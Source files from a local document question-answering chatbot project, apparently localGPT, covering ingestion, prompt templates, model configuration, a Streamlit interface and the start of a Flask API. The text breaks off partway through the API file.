File: localGPT_UI.py import torch import subprocess import streamlit as st from run_localGPT import load_model from langchain.vectorstores import Chroma from constants import CHROMA_SETTINGS, EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.chains import RetrievalQA from streamlit_extras.add_vertical_space import add_vertical_space from langchain.prompts import PromptTemplate from langchain.memory import ConversationBufferMemory def model_memory(): # Adding history to the model. template = """Use the following pieces of context to answer the question at the end. If you don't know the answer,\ just say that you don't know, don't try to make up an answer. {context} {history} Question: {question} Helpful Answer:""" prompt = PromptTemplate(input_variables=["history", "context", "question"], template=template) memory = ConversationBufferMemory(input_key="question", memory_key="history") return prompt, memory # Sidebar contents with st.sidebar: st.title("🤗💬 Converse with your Data") st.markdown( """ ## About This app is an LLM-powered chatbot built using: - [Streamlit](https://streamlit.io/) - [LangChain](https://python.langchain.com/) - [LocalGPT](https://github.com/PromtEngineer/localGPT) """ ) add_vertical_space(5) st.write("Made with ❤️ by [Prompt Engineer](https://youtube.com/@engineerprompt)") if torch.backends.mps.is_available(): DEVICE_TYPE = "mps" elif torch.cuda.is_available(): DEVICE_TYPE = "cuda" else: DEVICE_TYPE = "cpu" # if "result" not in st.session_state: # # Run the document ingestion process. # run_langest_commands = ["python", "ingest.py"] # run_langest_commands.append("--device_type") # run_langest_commands.append(DEVICE_TYPE) # result = subprocess.run(run_langest_commands, capture_output=True) # st.session_state.result = result # Define the retreiver # load the vectorstore if "EMBEDDINGS" not in st.session_state: EMBEDDINGS = HuggingFaceInstructEmbeddings(model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": DEVICE_TYPE}) st.session_state.EMBEDDINGS = EMBEDDINGS if "DB" not in st.session_state: DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=st.session_state.EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) st.session_state.DB = DB if "RETRIEVER" not in st.session_state: RETRIEVER = DB.as_retriever() st.session_state.RETRIEVER = RETRIEVER if "LLM" not in st.session_state: LLM = load_model(device_type=DEVICE_TYPE, model_id=MODEL_ID, model_basename=MODEL_BASENAME) st.session_state["LLM"] = LLM if "QA" not in st.session_state: prompt, memory = model_memory() QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=True, chain_type_kwargs={"prompt": prompt, "memory": memory}, ) st.session_state["QA"] = QA st.title("LocalGPT App 💬") # Create a text input box for the user prompt = st.text_input("Input your prompt here") # while True: # If the user hits enter if prompt: # Then pass the prompt to the LLM response = st.session_state["QA"](prompt) answer, docs = response["result"], response["source_documents"] # ...and write it out to the screen st.write(answer) # With a streamlit expander with st.expander("Document Similarity Search"): # Find the relevant pages search = st.session_state.DB.similarity_search_with_score(prompt) # Write out the first for i, doc in enumerate(search): # print(doc) st.write(f"Source Document # {i+1} : {doc[0].metadata['source'].split('/')[-1]}") st.write(doc[0].page_content) 
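            # Divider between consecutive source documents for readability.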
st.write("--------------------------------") File: crawl.py import os import shutil import click import subprocess from constants import ( DOCUMENT_MAP, SOURCE_DIRECTORY ) def logToFile(logentry): file1 = open("crawl.log","a") file1.write(logentry + "\n") file1.close() print(logentry + "\n") @click.command() @click.option( "--device_type", default="cuda", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) @click.option( "--landing_directory", default="./LANDING_DOCUMENTS" ) @click.option( "--processed_directory", default="./PROCESSED_DOCUMENTS" ) @click.option( "--error_directory", default="./ERROR_DOCUMENTS" ) @click.option( "--unsupported_directory", default="./UNSUPPORTED_DOCUMENTS" ) def main(device_type, landing_directory, processed_directory, error_directory, unsupported_directory): paths = [] os.makedirs(processed_directory, exist_ok=True) os.makedirs(error_directory, exist_ok=True) os.makedirs(unsupported_directory, exist_ok=True) for root, _, files in os.walk(landing_directory): for file_name in files: file_extension = os.path.splitext(file_name)[1] short_filename = os.path.basename(file_name) if not os.path.isdir(root + "/" + file_name): if file_extension in DOCUMENT_MAP.keys(): shutil.move(root + "/" + file_name, SOURCE_DIRECTORY+ "/" + short_filename) logToFile("START: " + root + "/" + short_filename) process = subprocess.Popen("python ingest.py --device_type=" + device_type, shell=True, stdout=subprocess.PIPE) process.wait() if process.returncode > 0: shutil.move(SOURCE_DIRECTORY + "/" + short_filename, error_directory + "/" + short_filename) logToFile("ERROR: " + root + "/" + short_filename) else: logToFile("VALID: " + root + "/" + short_filename) shutil.move(SOURCE_DIRECTORY + "/" + short_filename, processed_directory+ "/" + short_filename) else: shutil.move(root + "/" + file_name, unsupported_directory+ "/" + short_filename) if __name__ == "__main__": main() File: ingest.py import logging import os from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, as_completed import click import torch from langchain.docstore.document import Document from langchain.text_splitter import Language, RecursiveCharacterTextSplitter from langchain.vectorstores import Chroma from utils import get_embeddings from constants import ( CHROMA_SETTINGS, DOCUMENT_MAP, EMBEDDING_MODEL_NAME, INGEST_THREADS, PERSIST_DIRECTORY, SOURCE_DIRECTORY, ) def file_log(logentry): file1 = open("file_ingest.log", "a") file1.write(logentry + "\n") file1.close() print(logentry + "\n") def load_single_document(file_path: str) -> Document: # Loads a single document from a file path try: file_extension = os.path.splitext(file_path)[1] loader_class = DOCUMENT_MAP.get(file_extension) if loader_class: file_log(file_path + " loaded.") loader = loader_class(file_path) else: file_log(file_path + " document type is undefined.") raise ValueError("Document type is undefined") return loader.load()[0] except Exception as ex: file_log("%s loading error: \n%s" % (file_path, ex)) return None def load_document_batch(filepaths): logging.info("Loading document batch") # create a thread pool with ThreadPoolExecutor(len(filepaths)) as exe: # load files futures = [exe.submit(load_single_document, name) for name in filepaths] # collect data if futures is None: file_log(name + " failed to submit") return None else: data_list = [future.result() for future 
in futures] # return data and file paths return (data_list, filepaths) def load_documents(source_dir: str) -> list[Document]: # Loads all documents from the source documents directory, including nested folders paths = [] for root, _, files in os.walk(source_dir): for file_name in files: print("Importing: " + file_name) file_extension = os.path.splitext(file_name)[1] source_file_path = os.path.join(root, file_name) if file_extension in DOCUMENT_MAP.keys(): paths.append(source_file_path) # Have at least one worker and at most INGEST_THREADS workers n_workers = min(INGEST_THREADS, max(len(paths), 1)) chunksize = round(len(paths) / n_workers) docs = [] with ProcessPoolExecutor(n_workers) as executor: futures = [] # split the load operations into chunks for i in range(0, len(paths), chunksize): # select a chunk of filenames filepaths = paths[i : (i + chunksize)] # submit the task try: future = executor.submit(load_document_batch, filepaths) except Exception as ex: file_log("executor task failed: %s" % (ex)) future = None if future is not None: futures.append(future) # process all results for future in as_completed(futures): # open the file and load the data try: contents, _ = future.result() docs.extend(contents) except Exception as ex: file_log("Exception: %s" % (ex)) return docs def split_documents(documents: list[Document]) -> tuple[list[Document], list[Document]]: # Splits documents for correct Text Splitter text_docs, python_docs = [], [] for doc in documents: if doc is not None: file_extension = os.path.splitext(doc.metadata["source"])[1] if file_extension == ".py": python_docs.append(doc) else: text_docs.append(doc) return text_docs, python_docs @click.command() @click.option( "--device_type", default="cuda" if torch.cuda.is_available() else "cpu", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) def main(device_type): # Load documents and split in chunks logging.info(f"Loading documents from {SOURCE_DIRECTORY}") documents = load_documents(SOURCE_DIRECTORY) text_documents, python_documents = split_documents(documents) text_splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=200) python_splitter = RecursiveCharacterTextSplitter.from_language( language=Language.PYTHON, chunk_size=880, chunk_overlap=200 ) texts = text_splitter.split_documents(text_documents) texts.extend(python_splitter.split_documents(python_documents)) logging.info(f"Loaded {len(documents)} documents from {SOURCE_DIRECTORY}") logging.info(f"Split into {len(texts)} chunks of text") """ (1) Chooses an appropriate langchain library based on the enbedding model name. Matching code is contained within fun_localGPT.py. (2) Provides additional arguments for instructor and BGE models to improve results, pursuant to the instructions contained on their respective huggingface repository, project page or github repository. """ embeddings = get_embeddings(device_type) logging.info(f"Loaded embeddings from {EMBEDDING_MODEL_NAME}") db = Chroma.from_documents( texts, embeddings, persist_directory=PERSIST_DIRECTORY, client_settings=CHROMA_SETTINGS, ) if __name__ == "__main__": logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) main() File: prompt_template_utils.py """ This file implements prompt template for llama based models. 
Modify the prompt template based on the model you select. This seems to have significant impact on the output of the LLM. """ from langchain.memory import ConversationBufferMemory from langchain.prompts import PromptTemplate # this is specific to Llama-2. system_prompt = """You are a helpful assistant, you will use the provided context to answer user questions. Read the given context before answering questions and think step by step. If you can not answer a user question based on the provided context, inform the user. Do not use any other information for answering user. Provide a detailed answer to the question.""" def get_prompt_template(system_prompt=system_prompt, promptTemplate_type=None, history=False): if promptTemplate_type == "llama": B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" SYSTEM_PROMPT = B_SYS + system_prompt + E_SYS if history: instruction = """ Context: {history} \n {context} User: {question}""" prompt_template = B_INST + SYSTEM_PROMPT + instruction + E_INST prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: instruction = """ Context: {context} User: {question}""" prompt_template = B_INST + SYSTEM_PROMPT + instruction + E_INST prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) elif promptTemplate_type == "llama3": B_INST, E_INST = "<|start_header_id|>user<|end_header_id|>", "<|eot_id|>" B_SYS, E_SYS = "<|begin_of_text|><|start_header_id|>system<|end_header_id|> ", "<|eot_id|>" ASSISTANT_INST = "<|start_header_id|>assistant<|end_header_id|>" SYSTEM_PROMPT = B_SYS + system_prompt + E_SYS if history: instruction = """ Context: {history} \n {context} User: {question}""" prompt_template = SYSTEM_PROMPT + B_INST + instruction + ASSISTANT_INST prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: instruction = """ Context: {context} User: {question}""" prompt_template = SYSTEM_PROMPT + B_INST + instruction + ASSISTANT_INST prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) elif promptTemplate_type == "mistral": B_INST, E_INST = "<s>[INST] ", " [/INST]" if history: prompt_template = ( B_INST + system_prompt + """ Context: {history} \n {context} User: {question}""" + E_INST ) prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: prompt_template = ( B_INST + system_prompt + """ Context: {context} User: {question}""" + E_INST ) prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) else: # change this based on the model you have selected. 
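        # Generic fallback: a plain-text Context / User / Answer prompt with no
        # model-specific special tokens.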
if history: prompt_template = ( system_prompt + """ Context: {history} \n {context} User: {question} Answer:""" ) prompt = PromptTemplate(input_variables=["history", "context", "question"], template=prompt_template) else: prompt_template = ( system_prompt + """ Context: {context} User: {question} Answer:""" ) prompt = PromptTemplate(input_variables=["context", "question"], template=prompt_template) memory = ConversationBufferMemory(input_key="question", memory_key="history") print(f"Here is the prompt used: {prompt}") return ( prompt, memory, ) File: run_localGPT.py import os import logging import click import torch import utils from langchain.chains import RetrievalQA from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.llms import HuggingFacePipeline from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler # for streaming response from langchain.callbacks.manager import CallbackManager callback_manager = CallbackManager([StreamingStdOutCallbackHandler()]) from prompt_template_utils import get_prompt_template from utils import get_embeddings # from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.vectorstores import Chroma from transformers import ( GenerationConfig, pipeline, ) from load_models import ( load_quantized_model_awq, load_quantized_model_gguf_ggml, load_quantized_model_qptq, load_full_model, ) from constants import ( EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME, MAX_NEW_TOKENS, MODELS_PATH, CHROMA_SETTINGS, ) def load_model(device_type, model_id, model_basename=None, LOGGING=logging): """ Select a model for text generation using the HuggingFace library. If you are running this for the first time, it will download a model for you. subsequent runs will use the model from the disk. Args: device_type (str): Type of device to use, e.g., "cuda" for GPU or "cpu" for CPU. model_id (str): Identifier of the model to load from HuggingFace's model hub. model_basename (str, optional): Basename of the model if using quantized models. Defaults to None. Returns: HuggingFacePipeline: A pipeline object for text generation using the loaded model. Raises: ValueError: If an unsupported model or device type is provided. 
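
    Example (illustrative):
        llm = load_model("cuda", model_id=MODEL_ID, model_basename=MODEL_BASENAME)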
""" logging.info(f"Loading Model: {model_id}, on: {device_type}") logging.info("This action can take a few minutes!") if model_basename is not None: if ".gguf" in model_basename.lower(): llm = load_quantized_model_gguf_ggml(model_id, model_basename, device_type, LOGGING) return llm elif ".ggml" in model_basename.lower(): model, tokenizer = load_quantized_model_gguf_ggml(model_id, model_basename, device_type, LOGGING) elif ".awq" in model_basename.lower(): model, tokenizer = load_quantized_model_awq(model_id, LOGGING) else: model, tokenizer = load_quantized_model_qptq(model_id, model_basename, device_type, LOGGING) else: model, tokenizer = load_full_model(model_id, model_basename, device_type, LOGGING) # Load configuration from the model to avoid warnings generation_config = GenerationConfig.from_pretrained(model_id) # see here for details: # https://huggingface.co/docs/transformers/ # main_classes/text_generation#transformers.GenerationConfig.from_pretrained.returns # Create a pipeline for text generation pipe = pipeline( "text-generation", model=model, tokenizer=tokenizer, max_length=MAX_NEW_TOKENS, temperature=0.2, # top_p=0.95, repetition_penalty=1.15, generation_config=generation_config, ) local_llm = HuggingFacePipeline(pipeline=pipe) logging.info("Local LLM Loaded") return local_llm def retrieval_qa_pipline(device_type, use_history, promptTemplate_type="llama"): """ Initializes and returns a retrieval-based Question Answering (QA) pipeline. This function sets up a QA system that retrieves relevant information using embeddings from the HuggingFace library. It then answers questions based on the retrieved information. Parameters: - device_type (str): Specifies the type of device where the model will run, e.g., 'cpu', 'cuda', etc. - use_history (bool): Flag to determine whether to use chat history or not. Returns: - RetrievalQA: An initialized retrieval-based QA system. Notes: - The function uses embeddings from the HuggingFace library, either instruction-based or regular. - The Chroma class is used to load a vector store containing pre-computed embeddings. - The retriever fetches relevant documents or data based on a query. - The prompt and memory, obtained from the `get_prompt_template` function, might be used in the QA system. - The model is loaded onto the specified device using its ID and basename. - The QA system retrieves relevant documents using the retriever and then answers questions based on those documents. """ """ (1) Chooses an appropriate langchain library based on the enbedding model name. Matching code is contained within ingest.py. (2) Provides additional arguments for instructor and BGE models to improve results, pursuant to the instructions contained on their respective huggingface repository, project page or github repository. """ embeddings = get_embeddings(device_type) logging.info(f"Loaded embeddings from {EMBEDDING_MODEL_NAME}") # load the vectorstore db = Chroma(persist_directory=PERSIST_DIRECTORY, embedding_function=embeddings, client_settings=CHROMA_SETTINGS) retriever = db.as_retriever() # get the prompt template and memory if set by the user. prompt, memory = get_prompt_template(promptTemplate_type=promptTemplate_type, history=use_history) # load the llm pipeline llm = load_model(device_type, model_id=MODEL_ID, model_basename=MODEL_BASENAME, LOGGING=logging) if use_history: qa = RetrievalQA.from_chain_type( llm=llm, chain_type="stuff", # try other chains types as well. 
refine, map_reduce, map_rerank retriever=retriever, return_source_documents=True, # verbose=True, callbacks=callback_manager, chain_type_kwargs={"prompt": prompt, "memory": memory}, ) else: qa = RetrievalQA.from_chain_type( llm=llm, chain_type="stuff", # try other chains types as well. refine, map_reduce, map_rerank retriever=retriever, return_source_documents=True, # verbose=True, callbacks=callback_manager, chain_type_kwargs={ "prompt": prompt, }, ) return qa # chose device typ to run on as well as to show source documents. @click.command() @click.option( "--device_type", default="cuda" if torch.cuda.is_available() else "cpu", type=click.Choice( [ "cpu", "cuda", "ipu", "xpu", "mkldnn", "opengl", "opencl", "ideep", "hip", "ve", "fpga", "ort", "xla", "lazy", "vulkan", "mps", "meta", "hpu", "mtia", ], ), help="Device to run on. (Default is cuda)", ) @click.option( "--show_sources", "-s", is_flag=True, help="Show sources along with answers (Default is False)", ) @click.option( "--use_history", "-h", is_flag=True, help="Use history (Default is False)", ) @click.option( "--model_type", default="llama3", type=click.Choice( ["llama3", "llama", "mistral", "non_llama"], ), help="model type, llama3, llama, mistral or non_llama", ) @click.option( "--save_qa", is_flag=True, help="whether to save Q&A pairs to a CSV file (Default is False)", ) def main(device_type, show_sources, use_history, model_type, save_qa): """ Implements the main information retrieval task for a localGPT. This function sets up the QA system by loading the necessary embeddings, vectorstore, and LLM model. It then enters an interactive loop where the user can input queries and receive answers. Optionally, the source documents used to derive the answers can also be displayed. Parameters: - device_type (str): Specifies the type of device where the model will run, e.g., 'cpu', 'mps', 'cuda', etc. - show_sources (bool): Flag to determine whether to display the source documents used for answering. - use_history (bool): Flag to determine whether to use chat history or not. Notes: - Logging information includes the device type, whether source documents are displayed, and the use of history. - If the models directory does not exist, it creates a new one to store models. - The user can exit the interactive loop by entering "exit". - The source documents are displayed if the show_sources flag is set to True. """ logging.info(f"Running on: {device_type}") logging.info(f"Display Source Documents set to: {show_sources}") logging.info(f"Use history set to: {use_history}") # check if models directory do not exist, create a new one and store models here. if not os.path.exists(MODELS_PATH): os.mkdir(MODELS_PATH) qa = retrieval_qa_pipline(device_type, use_history, promptTemplate_type=model_type) # Interactive questions and answers while True: query = input("\nEnter a query: ") if query == "exit": break # Get the answer from the chain res = qa(query) answer, docs = res["result"], res["source_documents"] # Print the result print("\n\n> Question:") print(query) print("\n> Answer:") print(answer) if show_sources: # this is a flag that you can set to disable showing answers. 
# # Print the relevant sources used for the answer print("----------------------------------SOURCE DOCUMENTS---------------------------") for document in docs: print("\n> " + document.metadata["source"] + ":") print(document.page_content) print("----------------------------------SOURCE DOCUMENTS---------------------------") # Log the Q&A to CSV only if save_qa is True if save_qa: utils.log_to_csv(query, answer) if __name__ == "__main__": logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) main() File: constants.py import os # from dotenv import load_dotenv from chromadb.config import Settings # https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/excel.html?highlight=xlsx#microsoft-excel from langchain.document_loaders import CSVLoader, PDFMinerLoader, TextLoader, UnstructuredExcelLoader, Docx2txtLoader from langchain.document_loaders import UnstructuredFileLoader, UnstructuredMarkdownLoader from langchain.document_loaders import UnstructuredHTMLLoader # load_dotenv() ROOT_DIRECTORY = os.path.dirname(os.path.realpath(__file__)) # Define the folder for storing database SOURCE_DIRECTORY = f"{ROOT_DIRECTORY}/SOURCE_DOCUMENTS" PERSIST_DIRECTORY = f"{ROOT_DIRECTORY}/DB" MODELS_PATH = "./models" # Can be changed to a specific number INGEST_THREADS = os.cpu_count() or 8 # Define the Chroma settings CHROMA_SETTINGS = Settings( anonymized_telemetry=False, is_persistent=True, ) # Context Window and Max New Tokens CONTEXT_WINDOW_SIZE = 8096 MAX_NEW_TOKENS = CONTEXT_WINDOW_SIZE # int(CONTEXT_WINDOW_SIZE/4) #### If you get a "not enough space in the buffer" error, you should reduce the values below, start with half of the original values and keep halving the value until the error stops appearing N_GPU_LAYERS = 100 # Llama-2-70B has 83 layers N_BATCH = 512 ### From experimenting with the Llama-2-7B-Chat-GGML model on 8GB VRAM, these values work: # N_GPU_LAYERS = 20 # N_BATCH = 512 # https://python.langchain.com/en/latest/_modules/langchain/document_loaders/excel.html#UnstructuredExcelLoader DOCUMENT_MAP = { ".html": UnstructuredHTMLLoader, ".txt": TextLoader, ".md": UnstructuredMarkdownLoader, ".py": TextLoader, # ".pdf": PDFMinerLoader, ".pdf": UnstructuredFileLoader, ".csv": CSVLoader, ".xls": UnstructuredExcelLoader, ".xlsx": UnstructuredExcelLoader, ".docx": Docx2txtLoader, ".doc": Docx2txtLoader, } # Default Instructor Model EMBEDDING_MODEL_NAME = "hkunlp/instructor-large" # Uses 1.5 GB of VRAM (High Accuracy with lower VRAM usage) #### #### OTHER EMBEDDING MODEL OPTIONS #### # EMBEDDING_MODEL_NAME = "hkunlp/instructor-xl" # Uses 5 GB of VRAM (Most Accurate of all models) # EMBEDDING_MODEL_NAME = "intfloat/e5-large-v2" # Uses 1.5 GB of VRAM (A little less accurate than instructor-large) # EMBEDDING_MODEL_NAME = "intfloat/e5-base-v2" # Uses 0.5 GB of VRAM (A good model for lower VRAM GPUs) # EMBEDDING_MODEL_NAME = "all-MiniLM-L6-v2" # Uses 0.2 GB of VRAM (Less accurate but fastest - only requires 150mb of vram) #### #### MULTILINGUAL EMBEDDING MODELS #### # EMBEDDING_MODEL_NAME = "intfloat/multilingual-e5-large" # Uses 2.5 GB of VRAM # EMBEDDING_MODEL_NAME = "intfloat/multilingual-e5-base" # Uses 1.2 GB of VRAM #### SELECT AN OPEN SOURCE LLM (LARGE LANGUAGE MODEL) # Select the Model ID and model_basename # load the LLM for generating Natural Language responses #### GPU VRAM Memory required for LLM Models (ONLY) by Billion Parameter value (B Model) #### Does not include VRAM used by Embedding Models - 
which use an additional 2GB-7GB of VRAM depending on the model. #### #### (B Model) (float32) (float16) (GPTQ 8bit) (GPTQ 4bit) #### 7b 28 GB 14 GB 7 GB - 9 GB 3.5 GB - 5 GB #### 13b 52 GB 26 GB 13 GB - 15 GB 6.5 GB - 8 GB #### 32b 130 GB 65 GB 32.5 GB - 35 GB 16.25 GB - 19 GB #### 65b 260.8 GB 130.4 GB 65.2 GB - 67 GB 32.6 GB - - 35 GB # MODEL_ID = "TheBloke/Llama-2-7B-Chat-GGML" # MODEL_BASENAME = "llama-2-7b-chat.ggmlv3.q4_0.bin" #### #### (FOR GGUF MODELS) #### # MODEL_ID = "TheBloke/Llama-2-13b-Chat-GGUF" # MODEL_BASENAME = "llama-2-13b-chat.Q4_K_M.gguf" # MODEL_ID = "TheBloke/Llama-2-7b-Chat-GGUF" # MODEL_BASENAME = "llama-2-7b-chat.Q4_K_M.gguf" # MODEL_ID = "QuantFactory/Meta-Llama-3-8B-Instruct-GGUF" # MODEL_BASENAME = "Meta-Llama-3-8B-Instruct.Q4_K_M.gguf" # LLAMA 3 # use for Apple Silicon MODEL_ID = "meta-llama/Meta-Llama-3-8B-Instruct" MODEL_BASENAME = None # LLAMA 3 # use for NVIDIA GPUs # MODEL_ID = "unsloth/llama-3-8b-bnb-4bit" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/Mistral-7B-Instruct-v0.1-GGUF" # MODEL_BASENAME = "mistral-7b-instruct-v0.1.Q8_0.gguf" # MODEL_ID = "TheBloke/Llama-2-70b-Chat-GGUF" # MODEL_BASENAME = "llama-2-70b-chat.Q4_K_M.gguf" #### #### (FOR HF MODELS) #### # MODEL_ID = "NousResearch/Llama-2-7b-chat-hf" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/vicuna-7B-1.1-HF" # MODEL_BASENAME = None # MODEL_ID = "TheBloke/Wizard-Vicuna-7B-Uncensored-HF" # MODEL_ID = "TheBloke/guanaco-7B-HF" # MODEL_ID = 'NousResearch/Nous-Hermes-13b' # Requires ~ 23GB VRAM. Using STransformers # alongside will 100% create OOM on 24GB cards. # llm = load_model(device_type, model_id=model_id) #### #### (FOR GPTQ QUANTIZED) Select a llm model based on your GPU and VRAM GB. Does not include Embedding Models VRAM usage. #### ##### 48GB VRAM Graphics Cards (RTX 6000, RTX A6000 and other 48GB VRAM GPUs) ##### ### 65b GPTQ LLM Models for 48GB GPUs (*** With best embedding model: hkunlp/instructor-xl ***) # MODEL_ID = "TheBloke/guanaco-65B-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/Airoboros-65B-GPT4-2.0-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/gpt4-alpaca-lora_mlp-65B-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/Upstage-Llama1-65B-Instruct-GPTQ" # MODEL_BASENAME = "model.safetensors" ##### 24GB VRAM Graphics Cards (RTX 3090 - RTX 4090 (35% Faster) - RTX A5000 - RTX A5500) ##### ### 13b GPTQ Models for 24GB GPUs (*** With best embedding model: hkunlp/instructor-xl ***) # MODEL_ID = "TheBloke/Wizard-Vicuna-13B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-13B-Uncensored-GPTQ-4bit-128g.compat.no-act-order.safetensors" # MODEL_ID = "TheBloke/vicuna-13B-v1.5-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/Nous-Hermes-13B-GPTQ" # MODEL_BASENAME = "nous-hermes-13b-GPTQ-4bit-128g.no-act.order" # MODEL_ID = "TheBloke/WizardLM-13B-V1.2-GPTQ" # MODEL_BASENAME = "gptq_model-4bit-128g.safetensors ### 30b GPTQ Models for 24GB GPUs (*** Requires using intfloat/e5-base-v2 instead of hkunlp/instructor-large as embedding model ***) # MODEL_ID = "TheBloke/Wizard-Vicuna-30B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-30B-Uncensored-GPTQ-4bit--1g.act.order.safetensors" # MODEL_ID = "TheBloke/WizardLM-30B-Uncensored-GPTQ" # MODEL_BASENAME = "WizardLM-30B-Uncensored-GPTQ-4bit.act-order.safetensors" ##### 8-10GB VRAM Graphics Cards (RTX 3080 - RTX 3080 Ti - RTX 3070 Ti - 3060 Ti - RTX 2000 Series, Quadro RTX 4000, 5000, 6000) ##### ### (*** Requires using intfloat/e5-small-v2 instead of 
hkunlp/instructor-large as embedding model ***) ### 7b GPTQ Models for 8GB GPUs # MODEL_ID = "TheBloke/Wizard-Vicuna-7B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-7B-Uncensored-GPTQ-4bit-128g.no-act.order.safetensors" # MODEL_ID = "TheBloke/WizardLM-7B-uncensored-GPTQ" # MODEL_BASENAME = "WizardLM-7B-uncensored-GPTQ-4bit-128g.compat.no-act-order.safetensors" # MODEL_ID = "TheBloke/wizardLM-7B-GPTQ" # MODEL_BASENAME = "wizardLM-7B-GPTQ-4bit.compat.no-act-order.safetensors" #### #### (FOR GGML) (Quantized cpu+gpu+mps) models - check if they support llama.cpp #### # MODEL_ID = "TheBloke/wizard-vicuna-13B-GGML" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q4_0.bin" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q6_K.bin" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q2_K.bin" # MODEL_ID = "TheBloke/orca_mini_3B-GGML" # MODEL_BASENAME = "orca-mini-3b.ggmlv3.q4_0.bin" #### #### (FOR AWQ QUANTIZED) Select a llm model based on your GPU and VRAM GB. Does not include Embedding Models VRAM usage. ### (*** MODEL_BASENAME is not actually used but have to contain .awq so the correct model loading is used ***) ### (*** Compute capability 7.5 (sm75) and CUDA Toolkit 11.8+ are required ***) #### # MODEL_ID = "TheBloke/Llama-2-7B-Chat-AWQ" # MODEL_BASENAME = "model.safetensors.awq" File: run_localGPT_API.py import logging import os import shutil import subprocess import argparse import torch from flask import Flask, jsonify, request from langchain.chains import RetrievalQA from langchain.embeddings import HuggingFaceInstructEmbeddings # from langchain.embeddings import HuggingFaceEmbeddings from run_localGPT import load_model from prompt_template_utils import get_prompt_template # from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.vectorstores import Chroma from werkzeug.utils import secure_filename from constants import CHROMA_SETTINGS, EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME # API queue addition from threading import Lock request_lock = Lock() if torch.backends.mps.is_available(): DEVICE_TYPE = "mps" elif torch.cuda.is_available(): DEVICE_TYPE = "cuda" else: DEVICE_TYPE = "cpu" SHOW_SOURCES = True logging.info(f"Running on: {DEVICE_TYPE}") logging.info(f"Display Source Documents set to: {SHOW_SOURCES}") EMBEDDINGS = HuggingFaceInstructEmbeddings(model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": DEVICE_TYPE}) # uncomment the following line if you used HuggingFaceEmbeddings in the ingest.py # EMBEDDINGS = HuggingFaceEmbeddings(model_name=EMBEDDING_MODEL_NAME) # if os.path.exists(PERSIST_DIRECTORY): # try: # shutil.rmtree(PERSIST_DIRECTORY) # except OSError as e: # print(f"Error: {e.filename} - {e.strerror}.") # else: # print("The directory does not exist") # run_langest_commands = ["python", "ingest.py"] # if DEVICE_TYPE == "cpu": # run_langest_commands.append("--device_type") # run_langest_commands.append(DEVICE_TYPE) # result = subprocess.run(run_langest_commands, capture_output=True) # if result.returncode != 0: # raise FileNotFoundError( # "No files were found inside SOURCE_DOCUMENTS, please put a starter file inside before starting the API!" 
# ) # load the vectorstore DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) RETRIEVER = DB.as_retriever() LLM = load_model(device_type=DEVICE_TYPE, model_id=MODEL_ID, model_basename=MODEL_BASENAME) prompt, memory = get_prompt_template(promptTemplate_type="llama", history=False) QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=SHOW_SOURCES, chain_type_kwargs={ "prompt": prompt, }, ) app = Flask(__name__) @app.route("/api/delete_source", methods=["GET"]) def delete_source_route(): folder_name = "SOURCE_DOCUMENTS" if os.path.exists(folder_name): shutil.rmtree(folder_name) os.makedirs(folder_name) return jsonify({"message": f"Folder '{folder_name}' successfully deleted and recreated."}) @app.route("/api/save_document", methods=["GET", "POST"]) def save_document_route(): if "document" not in request.files: return "No document part", 400 file = request.files["document"] if file.filename == "": return "No selected file", 400 if file: filename = secure_filename(file.filename) folder_path = "SOURCE_DOCUMENTS" if not os.path.exists(folder_path): 